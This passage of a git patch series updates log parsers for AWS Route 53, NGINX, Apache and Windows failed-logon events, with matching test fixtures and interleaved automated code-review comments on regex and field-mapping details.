Address\",\"type_id\":2},{\"name\":\"answers[].rdata\",\"value\":\"atm-settingsfe-prod-geo2.trafficmanager.net.\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"query.hostname\",\"value\":\"settings-win.data.microsoft.com.\",\"type\":\"Hostname\",\"type_id\":1}]}\n", + "sekoiaio": { + "intake": { + "dialect": "OCSF", + "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5" + } + } + }, + "expected": { + "message": "{\"metadata\":{\"product\":{\"version\":\"1.100000\",\"name\":\"Route 53\",\"feature\":{\"name\":\"Resolver Query Logs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"src_endpoint\":{\"vpc_uid\":\"vpc-11111111\",\"ip\":\"1.2.3.4\",\"port\":62699,\"instance_uid\":\"i-11111111111111111\"},\"time\":1726395887000,\"time_dt\":1726395887000,\"query\":{\"hostname\":\"settings-win.data.microsoft.com.\",\"type\":\"A\",\"class\":\"IN\"},\"answers\":[{\"type\":\"CNAME\",\"rdata\":\"atm-settingsfe-prod-geo2.trafficmanager.net.\",\"class\":\"IN\"},{\"type\":\"CNAME\",\"rdata\":\"settings-prod-weu-2.westeurope.cloudapp.azure.com.\",\"class\":\"IN\"},{\"type\":\"A\",\"rdata\":\"5.6.7.8\",\"class\":\"IN\"}],\"connection_info\":{\"protocol_name\":\"UDP\",\"direction\":\"Unknown\",\"direction_id\":0},\"dst_endpoint\":null,\"firewall_rule\":null,\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"DNS Activity\",\"class_uid\":4003,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_id\":6,\"activity_name\":\"Traffic\",\"type_uid\":400306,\"type_name\":\"DNS Activity: Traffic\",\"rcode_id\":0,\"rcode\":\"NoError\",\"disposition\":\"Unknown\",\"action\":\"Unknown\",\"action_id\":0,\"unmapped\":null,\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"answers[].rdata\",\"value\":\"settings-prod-weu-2.westeurope.cloudapp.azure.com.\",\"type\":\"IP 
Address\",\"type_id\":2},{\"name\":\"src_endpoint.instance_uid\",\"value\":\"i-11111111111111111\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"answers[].rdata\",\"value\":\"5.6.7.8\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"answers[].rdata\",\"value\":\"atm-settingsfe-prod-geo2.trafficmanager.net.\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"query.hostname\",\"value\":\"settings-win.data.microsoft.com.\",\"type\":\"Hostname\",\"type_id\":1}]}\n", + "event": { + "action": "traffic", + "category": [ + "network" + ], + "kind": "event", + "severity": 1, + "type": [ + "info", + "protocol" + ] + }, + "@timestamp": "2024-09-15T10:24:47Z", + "cloud": { + "account": { + "id": "111111111111" + }, + "provider": "AWS", + "region": "eu-west-3" + }, + "dns": { + "answers": [ + { + "class": "IN", + "data": "atm-settingsfe-prod-geo2.trafficmanager.net.", + "type": "CNAME" + }, + { + "class": "IN", + "data": "settings-prod-weu-2.westeurope.cloudapp.azure.com.", + "type": "CNAME" + }, + { + "class": "IN", + "data": "5.6.7.8", + "type": "A" + } + ], + "question": { + "class": [ + "IN" + ], + "name": "settings-win.data.microsoft.com.", + "registered_domain": "microsoft.com", + "subdomain": "settings-win.data", + "top_level_domain": "com", + "type": [ + "A" + ] + }, + "response_code": "NoError" + }, + "network": { + "direction": [ + "unknown" + ] + }, + "ocsf": { + "activity_id": 6, + "activity_name": "Traffic", + "class_name": "DNS Activity", + "class_uid": 4003 + }, + "related": { + "hosts": [ + "settings-win.data.microsoft.com." + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 62699 + } + } +} \ No newline at end of file From 7470654a8b1a7cabadc70684ab962e7d699febf4 Mon Sep 17 00:00:00 2001 
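Review bot: The expected output pins `related.ip` to the client `1.2.3.4` only, while the resolved `A` answer `5.6.7.8` is kept solely in `dns.answers[].data`; if the parser is meant to surface resolved addresses for pivoting, this fixture is the place to pin that expectation, otherwise it documents the current behaviour and a short note in the commit message would save the next reader the question. The file also ends without a trailing newline.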
From: Sebastien Quioc Date: Fri, 27 Sep 2024 18:40:54 +0200 Subject: [PATCH 080/317] fix(Nginx): extract the forwarded ip --- NGINX/nginx/ingest/parser.yml | 6 ++++-- NGINX/nginx/tests/extended.json | 7 +++++-- NGINX/nginx/tests/extended_backslash.json | 3 +++ 3 files changed, 12 insertions(+), 4 deletions(-) diff --git a/NGINX/nginx/ingest/parser.yml b/NGINX/nginx/ingest/parser.yml index f2fc51cc1..8a7f7c38b 100644 --- a/NGINX/nginx/ingest/parser.yml +++ b/NGINX/nginx/ingest/parser.yml 
@@ -11,7 +11,7 @@ pipeline: ERR_MSG: "[^,]*" NGINXURL: "(%{URIPROTO:url_scheme}://)?(?:%{USER:url_username}(?::[^@]*)?@)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" ERROR: '%{TIMER:time_error} \[%{WORD:log_level}\] %{NUMBER}#%{NUMBER}: (\*%{NUMBER} )?(%{ERR_MSG:error_message})?(%{DATA}client:\s+%{IP:source_address})?(%{DATA}server:\s+%{IPORHOST:destination_address})?(%{DATA}request: \"%{WORD:request_method} %{NGINXURL:url_original} HTTP/%{NUMBER:http_version}\")?(%{DATA}upstream: \"%{URIPROTO}://(?:%{USER}(?::[^@]*)?@)?(?:%{IPORHOST:url_name}(?::%{POSINT:url_port})?)?(?:%{URIPATHPARAM})?\")?(%{DATA}host:%{DATA}\"%{IPORHOST:host_name}(:%{INT})?\")?(%{DATA}responder:%{DATA}%{IPORHOST:responder_name})?(%{DATA}peer:%{DATA}%{IPORHOST:url_name}(:%{INT:url_port})?)?(%{DATA}certificate:%{DATA}\"%{URIPATH:certificate}\")?%{GREEDYDATA}' - COMBINED: '(%{IPORHOST:destination_address} )?%{IP:source_address} - (-|%{DATA:source_user_name})? \[%{HTTPDATE:time_local}\] \"(-|%{WORD:request_method} %{NOTSPACE:url_original} HTTP/%{NUMBER:http_version}|%{HTTP_ERROR:raw_url})?\" %{NUMBER:response_status} (-|%{NUMBER:body_bytes_sent})? \"(-|%{DATA:http_referrer})?\" \"%{DATA:http_user_agent}\"( \"%{DATA}\")?( \"%{DATA}\")?( \"%{DATA}\")?( \"%{DATA:http_response_mimetype}\")?(%{GREEDYDATA})?' + COMBINED: '(%{IPORHOST:destination_address} )?%{IP:source_address} - (-|%{DATA:source_user_name})? \[%{HTTPDATE:time_local}\] \"(-|%{WORD:request_method} %{NOTSPACE:url_original} HTTP/%{NUMBER:http_version}|%{HTTP_ERROR:raw_url})?\" %{NUMBER:response_status} (-|%{NUMBER:body_bytes_sent})? \"(-|%{DATA:http_referrer})?\" \"%{DATA:http_user_agent}\"( \"%{DATA:proxy_add_x_forwarded_for}\")?( \"%{DATA}\")?( \"%{DATA}\")?( \"%{DATA:http_response_mimetype}\")?(%{GREEDYDATA})?' filter: '{{original.message | re_match("\{(?:[^{}]|())*\}") == False}}' - name: parsed_event external: 
@@ -99,7 +99,6 @@ stages:
 {%- endif -%}
 host.name: "{{parsed_event.message.host_name}}"
 log.level: "{{parsed_event.message.log_level}}"
- network.forwarded_ip: "{{parsed_event.message.proxy_add_x_forwarded_for}}"
 network.protocol: "{{parsed_event.message.http_scheme}}"
 nginx.server.certificate.directory: "{{parsed_event.message.certificate.split('/')[:-1]|join('/')}}"
 nginx.server.certificate.extension: "{{parsed_event.message.certificate.split('.')|last}}"
@@ -109,6 +108,9 @@ stages:
 - set:
 source.ip: "{{parsed_event.message.remote_addr}}"
 filter: "{{parsed_event.message.remote_addr | is_ipaddress}}"
+ - set:
+ network.forwarded_ip: "{{parsed_event.message.proxy_add_x_forwarded_for.split(', ')[0]}}"
+ filter: "{{parsed_event.message.proxy_add_x_forwarded_for not in ['', '-']}}"
 - set:
 source.ip: "{{parsed_event.message.source_address}}"
 filter: "{{parsed_event.message.source_address | is_ipaddress}}"
diff --git a/NGINX/nginx/tests/extended.json b/NGINX/nginx/tests/extended.json
index c4309202b..4a01e55f4 100644
--- a/NGINX/nginx/tests/extended.json
+++ b/NGINX/nginx/tests/extended.json
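Review bot: The new `network.forwarded_ip` action splits on `', '` and takes the first element with no `is_ipaddress` guard, unlike the neighbouring `source.ip` actions; a header written as `a,b` without a space, or a non-address token such as `unknown`, would put an unparsed string into an ip-typed field. Splitting on `','` and trimming, then filtering like the adjacent actions, keeps the style consistent: `network.forwarded_ip: "{{parsed_event.message.proxy_add_x_forwarded_for.split(',')[0] | trim}}"` with `filter: "{{parsed_event.message.proxy_add_x_forwarded_for.split(',')[0] | trim | is_ipaddress}}"`. The first hop of X-Forwarded-For is client-supplied, so the extracted value is only as trustworthy as the proxy chain in front of nginx — a one-line comment on the action would stop it being read as an authoritative client address. The grok change in the hunk above assigns this capture purely by the position of the first quoted extra field, so it relies on the configured log format matching the fixture's order; worth stating in the comment as well.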
@@ -1,9 +1,9 @@ { "input": { - "message": " rdp.acme.com 1.2.3.4 - - [22/Aug/2019:08:28:30 +0200] \"GET /lib/example.txt?key1=111111&time=1566455309850 HTTP/1.1\" 200 2 \"http://rdp.acme.com/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\" \"1.2.3.4\" \"0.010\" \"-/-\" \"text/plain\"" + "message": " rdp.acme.com 1.2.3.4 - - [22/Aug/2019:08:28:30 +0200] \"GET /lib/example.txt?key1=111111&time=1566455309850 HTTP/1.1\" 200 2 \"http://rdp.acme.com/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\" \"1.2.3.4, 4.3.2.1\" \"0.010\" \"-/-\" \"text/plain\"" }, "expected": { - "message": " rdp.acme.com 1.2.3.4 - - [22/Aug/2019:08:28:30 +0200] \"GET /lib/example.txt?key1=111111&time=1566455309850 HTTP/1.1\" 200 2 \"http://rdp.acme.com/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\" \"1.2.3.4\" \"0.010\" \"-/-\" \"text/plain\"", + "message": " rdp.acme.com 1.2.3.4 - - [22/Aug/2019:08:28:30 +0200] \"GET /lib/example.txt?key1=111111&time=1566455309850 HTTP/1.1\" 200 2 \"http://rdp.acme.com/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\" \"1.2.3.4, 4.3.2.1\" \"0.010\" \"-/-\" \"text/plain\"", "event": { "category": [ "web" @@ -30,6 +30,9 @@ }, "version": "1.1" }, + "network": { + "forwarded_ip": "1.2.3.4" + }, "observer": { "product": "nginx", "type": "WEB server", diff --git a/NGINX/nginx/tests/extended_backslash.json b/NGINX/nginx/tests/extended_backslash.json index ab67bc37a..ff603b50e 100644 --- a/NGINX/nginx/tests/extended_backslash.json +++ b/NGINX/nginx/tests/extended_backslash.json @@ -30,6 +30,9 @@ }, "version": "1.1" }, + "network": { + "forwarded_ip": "1.2.3.4" + }, "observer": { "product": "nginx", "type": "WEB server", 
From c1f0eddd2dee04e2096701fc8647d91c81fda83a Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Fri, 27 Sep 2024 19:13:06 +0200 Subject: [PATCH 081/317] fix(Apache): extract the destination address from the extended logs --- Apache/apache/ingest/parser.yml | 6 ++++-- Apache/apache/tests/access_extended.json | 15 ++++++++++----- 2 files changed, 14 insertions(+), 7 deletions(-) diff --git a/Apache/apache/ingest/parser.yml b/Apache/apache/ingest/parser.yml index 8754527ec..6f5dc2641 100644 --- a/Apache/apache/ingest/parser.yml +++ b/Apache/apache/ingest/parser.yml 
@@ -12,9 +12,9 @@ pipeline: # HTTPD standard logs HTTPD20_ERRORLOG: '\[%{HTTPDERROR_DATE}\] \[%{LOGLEVEL:action_name}\] (?:\[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?\] ){0,1}%{GREEDYDATA:action_outcome_reason}' HTTPD24_ERRORLOG: '\[%{HTTPDERROR_DATE}\] \[%{WORD}?:%{LOGLEVEL:action_name}\] \[pid %{POSINT:process_id}(:tid %{NUMBER:process_thread_id})?\]( \(%{POSINT}\)%{DATA}:)?( \[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?(:%{POSINT:source_port})?\])?( %{DATA}:)? %{GREEDYDATA:action_outcome_reason}' - HTTPD_COMBINEDLOG: "%{HTTPD_COMMONLOG} %{QS:http_request_referrer} %{QS:user_agent_original}" + HTTPD_COMBINEDLOG: '%{HTTPD_COMMONLOG} %{QS:http_request_referrer} %{QS:user_agent_original}' HTTPD_COMMONLOG: >- - %{IPORHOST:source_ip} (?:-|%{HTTPDUSER:apache_access_user_identity}) (?:-( -)*|%{HTTPDUSER:user_name}) \[%{HTTPDATE:timestamp}]\ "(?:%{WORD:http_request_method} %{NOTSPACE:url_original}(?: HTTP/%{NUMBER:http_version})?|%{DATA})" (?:-|%{INT:http_response_status_code:int}) (?:-|%{INT:http_response_body_bytes:int})%{GREEDYDATA} + (%{IPORHOST:destination_address}(:%{NUMBER:destination_port})? )?%{IPORHOST:source_ip} (?:-|%{HTTPDUSER:apache_access_user_identity}) (?:-( -)*|%{HTTPDUSER:user_name}) \[%{HTTPDATE:timestamp}]\ "(?:%{WORD:http_request_method} %{NOTSPACE:url_original}(?: HTTP/%{NUMBER:http_version})?|%{DATA})" (?:-|%{INT:http_response_status_code:int}) (?:-|%{INT:http_response_body_bytes:int})%{GREEDYDATA} # Apache ModSecurity logs APACHEERRORPREFIX: '(\[%{HTTPDERROR_DATE:timestamp}\] )?(\[%{WORD}?:%{LOGLEVEL:action_name}\] )?(\[pid %{POSINT:process_pid}(:tid %{NUMBER:process_thread_id})?\] )?(\[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?(:%{NUMBER:source_port})?\])?.*' MODSECHOSTNAME: '\[hostname "?%{DATA:destination_domain}"?\]' 
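Review bot: The new optional prefix `(%{IPORHOST:destination_address}(:%{NUMBER:destination_port})? )?` uses the same IPORHOST class as the `%{IPORHOST:source_ip}` capture that follows, so a four-token line with a non-dash identity field (`1.2.3.4 bob - - [...]`, the layout the old `24.202.202.247 - - - [...]` fixture represented) can now match with the client address as `destination_address` and `bob` as `source_ip`, whereas before the `( -)*` group absorbed the extra dash. The commit replaces that fixture with the `mydomain:443` form rather than keeping both, so the regression is untested; keeping the old line as a second fixture would pin the intended split. If hostname-only prefixes are not expected, making the `:port` part mandatory (Apache's `vhost_combined` writes `%v:%p`) removes the ambiguity.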
@@ -111,6 +111,8 @@ stages: url.original: "{{grok.event.url_original}}" user.name: "{{grok.event.user_name}}" user_agent.original: "{{grok.event.user_agent_original}}" + destination.address: "{{grok.event.destination_address}}" + destination.port: "{{grok.event.destination_port}}" - translate: dictionary: "info": ["info"] diff --git a/Apache/apache/tests/access_extended.json b/Apache/apache/tests/access_extended.json index b2c17d072..ccc1688fb 100644 --- a/Apache/apache/tests/access_extended.json +++ b/Apache/apache/tests/access_extended.json @@ -1,6 +1,6 @@ { "input": { - "message": "24.202.202.247 - - - [31/Jul/2024:16:41:52 +0200] \"GET /test/integration/abcdefgh123456.js HTTP/1.1\" 200 5771 \"https://www.website.fr/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/10101010 Firefox/128.0\" GoAway=- (107 47us) TLSv1.3 TLS_AES_256_GCM_SHA384", + "message": "mydomain:443 1.2.3.4 - - [31/Jul/2024:16:41:52 +0200] \"GET /test/integration/abcdefgh123456.js HTTP/1.1\" 200 5771 \"https://www.website.fr/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/10101010 Firefox/128.0\" GoAway=- (107 47us) TLSv1.3 TLS_AES_256_GCM_SHA384", "sekoiaio": { "intake": { "dialect": "Apache HTTP Server", @@ -9,7 +9,7 @@ } }, "expected": { - "message": "24.202.202.247 - - - [31/Jul/2024:16:41:52 +0200] \"GET /test/integration/abcdefgh123456.js HTTP/1.1\" 200 5771 \"https://www.website.fr/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/10101010 Firefox/128.0\" GoAway=- (107 47us) TLSv1.3 TLS_AES_256_GCM_SHA384", + "message": "mydomain:443 1.2.3.4 - - [31/Jul/2024:16:41:52 +0200] \"GET /test/integration/abcdefgh123456.js HTTP/1.1\" 200 5771 \"https://www.website.fr/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/10101010 Firefox/128.0\" GoAway=- (107 47us) TLSv1.3 TLS_AES_256_GCM_SHA384", "event": { "category": [ "web" 
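Review bot: `destination.address` and `destination.port` are appended after `user_agent.original` although the surrounding block is kept in alphabetical order (`url.original`, `user.name`, `user_agent.original`), so they should move up before `http.*`/`url.*` to match the file's style. The updated fixture also pins `"size_in_char": 0` under `destination`, which these two lines do not produce; presumably a later stage derives it, but it reads like an artefact of an empty value and is worth confirming before it is locked into the expected output.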
@@ -26,6 +26,11 @@ "timestamp": "31/Jul/2024:16:41:52 +0200" } }, + "destination": { + "address": "mydomain", + "port": 443, + "size_in_char": 0 + }, "http": { "request": { "method": "GET" @@ -38,12 +43,12 @@ }, "related": { "ip": [ - "24.202.202.247" + "1.2.3.4" ] }, "source": { - "address": "24.202.202.247", - "ip": "24.202.202.247" + "address": "1.2.3.4", + "ip": "1.2.3.4" }, "url": { "original": "/test/integration/abcdefgh123456.js", From 4a86df3cec4bc3edc62eaa07053f92e5baa6fffa Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Fri, 27 Sep 2024 19:15:50 +0200 Subject: [PATCH 082/317] fix(Apache): removed quotes from the extracted referer and the extracted user agent --- Apache/apache/ingest/parser.yml | 2 +- Apache/apache/tests/access_combined.json | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Apache/apache/ingest/parser.yml b/Apache/apache/ingest/parser.yml index 6f5dc2641..9375aab8a 100644 --- a/Apache/apache/ingest/parser.yml +++ b/Apache/apache/ingest/parser.yml 
@@ -12,7 +12,7 @@ pipeline:
 # HTTPD standard logs
 HTTPD20_ERRORLOG: '\[%{HTTPDERROR_DATE}\] \[%{LOGLEVEL:action_name}\] (?:\[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?\] ){0,1}%{GREEDYDATA:action_outcome_reason}'
 HTTPD24_ERRORLOG: '\[%{HTTPDERROR_DATE}\] \[%{WORD}?:%{LOGLEVEL:action_name}\] \[pid %{POSINT:process_id}(:tid %{NUMBER:process_thread_id})?\]( \(%{POSINT}\)%{DATA}:)?( \[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?(:%{POSINT:source_port})?\])?( %{DATA}:)? %{GREEDYDATA:action_outcome_reason}'
- HTTPD_COMBINEDLOG: '%{HTTPD_COMMONLOG} %{QS:http_request_referrer} %{QS:user_agent_original}'
+ HTTPD_COMBINEDLOG: '%{HTTPD_COMMONLOG} "%{DATA:http_request_referrer}" "%{DATA:user_agent_original}"'
 HTTPD_COMMONLOG: >-
 (%{IPORHOST:destination_address}(:%{NUMBER:destination_port})? )?%{IPORHOST:source_ip} (?:-|%{HTTPDUSER:apache_access_user_identity}) (?:-( -)*|%{HTTPDUSER:user_name}) \[%{HTTPDATE:timestamp}]\ "(?:%{WORD:http_request_method} %{NOTSPACE:url_original}(?: HTTP/%{NUMBER:http_version})?|%{DATA})" (?:-|%{INT:http_response_status_code:int}) (?:-|%{INT:http_response_body_bytes:int})%{GREEDYDATA}
 # Apache ModSecurity logs
diff --git a/Apache/apache/tests/access_combined.json b/Apache/apache/tests/access_combined.json
index 4197c7d41..75299a8f6 100644
--- a/Apache/apache/tests/access_combined.json
+++ b/Apache/apache/tests/access_combined.json
@@ -23,7 +23,7 @@
 "http": {
 "request": {
 "method": "GET",
- "referrer": "\"http://www.example.com/start.html\""
+ "referrer": "http://www.example.com/start.html"
 },
 "response": {
 "bytes": 2326,
@@ -55,7 +55,7 @@
 "name": "Other"
 },
 "name": "Other",
- "original": "\"Mozilla/4.08 [en] (Win98; I ;Nav)\"",
+ "original": "Mozilla/4.08 [en] (Win98; I ;Nav)",
 "os": {
 "name": "Windows",
 "version": "98"
From 9db084b3dbfa323fac246e3f935cfb303aef923c Mon Sep 17 00:00:00 2001
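Review bot: Swapping `%{QS:…}` for `"%{DATA:…}"` in HTTPD_COMBINEDLOG loses the backslash-escape handling that the quoted-string pattern gave: a referer or user agent containing `\"` (how Apache writes a literal quote from the request header) is now cut at that escape, and because the pattern is unanchored the match still succeeds with the truncated value. User-Agent and Referer are client-controlled, so a detection keyed on `user_agent.original` would then only see the prefix. If the intent is just to drop the surrounding quotes, keeping `%{QS:…}` and stripping them at the `set` step preserves the old matching, e.g. `user_agent.original: "{{grok.event.user_agent_original | trim('\"')}}"` (the `set` stage that reads these fields is outside this hunk). Note that HTTPD_COMMONLOG ends in `%{GREEDYDATA}`, so the two quoted fields are located by backtracking from the end of the line rather than by position; worth a one-line comment above HTTPD_COMBINEDLOG.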
From: Sebastien Quioc
Date: Fri, 27 Sep 2024 19:16:11 +0200
Subject: [PATCH 083/317] feat(Apache): add ignored values
---
 Apache/apache/ingest/parser.yml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/Apache/apache/ingest/parser.yml b/Apache/apache/ingest/parser.yml
index 9375aab8a..f484b598d 100644
--- a/Apache/apache/ingest/parser.yml
+++ b/Apache/apache/ingest/parser.yml
@@ -1,4 +1,5 @@
 name: apache
+ignored_values: ["","-"]
 pipeline:
 - name: grok
 description: parse received message
From 73fd8adf2feeed759bb04473394f8cb947e5df71 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Fri, 27 Sep 2024 19:19:52 +0200
Subject: [PATCH 084/317] fix(Apache): Apply prettier
---
 Apache/apache/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Apache/apache/ingest/parser.yml b/Apache/apache/ingest/parser.yml
index f484b598d..ceb5fe576 100644
--- a/Apache/apache/ingest/parser.yml
+++ b/Apache/apache/ingest/parser.yml
@@ -1,5 +1,5 @@
 name: apache
-ignored_values: ["","-"]
+ignored_values: ["", "-"]
 pipeline:
 - name: grok
 description: parse received message
From 9cccd12f4a5de3635bf182365b94c8cb6aba220f Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev"
Date: Mon, 30 Sep 2024 13:46:18 +0300
Subject: [PATCH 085/317] Fix: Windows get failure reason
---
 Windows/windows/ingest/parser.yml | 12 ++-
 Windows/windows/tests/Event_4625_reason.json | 106 +++++++++++++++++++
 2 files changed, 117 insertions(+), 1 deletion(-)
 create mode 100644 Windows/windows/tests/Event_4625_reason.json
diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 8107e623a..fe3cbc5db 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -112,6 +112,16 @@ pipeline: CONTEXTINFO_FR: "(%{SPACE}Gravit%{DATA} = %{DATA:Severity}#NEWLINE#%{SPACE}Nom d%{DATA}h%{DATA}te = %{DATA:HostName}#NEWLINE#%{SPACE}Version de l%{DATA}h%{DATA}te = %{DATA:HostVersion}#NEWLINE#%{SPACE}ID d%{DATA}h%{DATA}te = %{DATA:HostId}#NEWLINE#%{SPACE}Application h%{DATA}te = %{DATA:HostApplication}#NEWLINE#%{SPACE}Version du moteur = %{DATA:EnginVersion}#NEWLINE#%{SPACE}ID d%{DATA}instance d%{DATA}ex%{DATA}cution = %{DATA:RunspaceID}#NEWLINE#%{SPACE}ID de pipeline = %{DATA:PipelineID}#NEWLINE#%{SPACE}Nom de commande = %{DATA:CommandName}#NEWLINE#%{SPACE}Type de commande = %{DATA:CommantType}#NEWLINE#%{SPACE}Nom du script = %{DATA:ScriptName}#NEWLINE#%{SPACE}Chemin de la commande = %{DATA:CommandPath}#NEWLINE#%{SPACE}Num%{DATA}ro de s%{DATA}quence = %{DATA:SequenceNumber}#NEWLINE#%{SPACE}Utilisateur = %{DATA:User}#NEWLINE#%{SPACE}Utilisateur connect%{DATA} = %{DATA:ConnectedUser}#NEWLINE#%{SPACE}ID d%{DATA}interpr%{DATA}teur de commandes = %{DATA:ShellID}#NEWLINE#%{GREEDYDATA})" CONTEXTINFO_EN: "(%{SPACE}Severity = %{DATA:Severity}#NEWLINE#%{SPACE}Host Name = %{DATA:HostName}#NEWLINE#%{SPACE}Host Version = %{DATA:HostVersion}#NEWLINE#%{SPACE}Host ID = %{DATA:HostID}#NEWLINE#%{SPACE}Host Application = %{DATA:HostApplication}#NEWLINE#%{SPACE}Engine Version = %{DATA:EnginVersion}#NEWLINE#%{SPACE}Runspace ID = %{DATA:RunspaceID}#NEWLINE#%{SPACE}Pipeline ID = %{DATA:PipelineID}#NEWLINE#%{SPACE}Command Name = %{DATA:CommandName}#NEWLINE#%{SPACE}Command Type = %{DATA:CommandType}#NEWLINE#%{SPACE}Script Name = %{DATA:ScriptName}#NEWLINE#%{SPACE}Command Path = %{DATA:CommandPath}#NEWLINE#%{SPACE}Sequence Number = %{DATA:SequenceNumber}#NEWLINE#%{SPACE}User = %{DATA:User}#NEWLINE#%{SPACE}Connected User = %{DATA:ConnectedUser}#NEWLINE#%{SPACE}Shell ID = %{DATA:ShellID}#NEWLINE#)" + - name: message_failure_reason + filter: "{{json.event.Message != null and 'Failure Reason' in json.event.Message}}" + external: + name: grok.match + properties: 
+ input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}'
+ output_field: result
+ pattern: >-
+ (%{GREEDYDATA}Failure Reason:\t\t%{DATA:FailureReason}#NEWLINE#\t%{GREEDYDATA})
+
 - name: network_object
 description: #NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format.
 filter: "{{json.event.Message != null and 'Accesses' in json.event.Message}}"
@@ -275,7 +285,7 @@ stages:
 event.code: "{{json.event.EventID}}"
 action.id: "{{json.event.EventID}}"
 event.provider: "{{json.event.SourceName}}"
- event.reason: "{{json.event.Description}}"
+ event.reason: "{{json.event.Description or message_failure_reason.result.FailureReason}}"
 file.created: "{{json.event.CreationUtcTime}}"
 file.owner: "{{json.event.jobOwner}}"
 log.hostname: "{{json.event.Hostname}}"
diff --git a/Windows/windows/tests/Event_4625_reason.json b/Windows/windows/tests/Event_4625_reason.json
new file mode 100644
index 000000000..8c5712d9d
--- /dev/null
+++ b/Windows/windows/tests/Event_4625_reason.json
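Review bot: The new `pattern` only accepts `#NEWLINE#` after the failure reason, but `input_field` maps a bare `\n` to `#NEWLINE2#`, so a 4625 message that arrives with LF-only line endings (a forwarder that normalises `\r\n` is enough) will not match even though the stage filter fired, and `event.reason` silently stays empty. Accepting either marker keeps the stage working for both forms: `(%{GREEDYDATA}Failure Reason:\t\t%{DATA:FailureReason}#NEWLINE2?#\t%{GREEDYDATA})`. The filter and pattern also assume the English `Failure Reason` label; this file already carries FR-localised patterns for other stages, so a non-English host falls back to `Description` without any signal — a comment on the stage such as `# English Message text only; localised hosts keep event.reason from Description` would make that explicit. The stage definition starts in the preceding chunk.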
@@ -0,0 +1,106 @@ +{ + "input": { + "message": "{\"Category\":\"Logon\",\"Channel\":\"Security\",\"EventID\":4625,\"EventType\":\"AUDIT_FAILURE\",\"Hostname\":\"test.test\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Advapi \",\"LogonType\":\"3\",\"Message\":\"An account failed to log on.\\r\\n\\r\\nSubject:\\r\\n\\tSecurity ID:\\t\\tS-1-5-18\\r\\n\\tAccount Name:\\t\\tTESTACCOUNTS$\\r\\n\\tAccount Domain:\\t\\tDOMAINNAME\\r\\n\\tLogon ID:\\t\\t0x3E7\\r\\n\\r\\nLogon Type:\\t\\t\\t3\\r\\n\\r\\nAccount For Which Logon Failed:\\r\\n\\tSecurity ID:\\t\\tS-1-0-0\\r\\n\\tAccount Name:\\t\\tTEST-USERNAME\\r\\n\\tAccount Domain:\\t\\tDOMAINNAME\\r\\n\\r\\nFailure Information:\\r\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\r\\n\\tStatus:\\t\\t\\t0xC000006D\\r\\n\\tSub Status:\\t\\t0xC000006A\\r\\n\\r\\nProcess Information:\\r\\n\\tCaller Process ID:\\t0x25c\\r\\n\\tCaller Process Name:\\tC:\\\\Windows\\\\System32\\\\lsass.exe\\r\\n\\r\\nNetwork Information:\\r\\n\\tWorkstation Name:\\tTESTACCOUNTS\\r\\n\\tSource Network Address:\\t192.168.128.203\\r\\n\\tSource Port:\\t\\t41974\\r\\n\\r\\nDetailed Authentication Information:\\r\\n\\tLogon Process:\\t\\tAdvapi \\r\\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\r\\n\\tTransited Services:\\t-\\r\\n\\tPackage Name (NTLM only):\\t-\\r\\n\\tKey Length:\\t\\t0\\r\\n\\r\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\r\\n\\r\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\r\\n\\r\\nThe Logon Type field indicates the kind 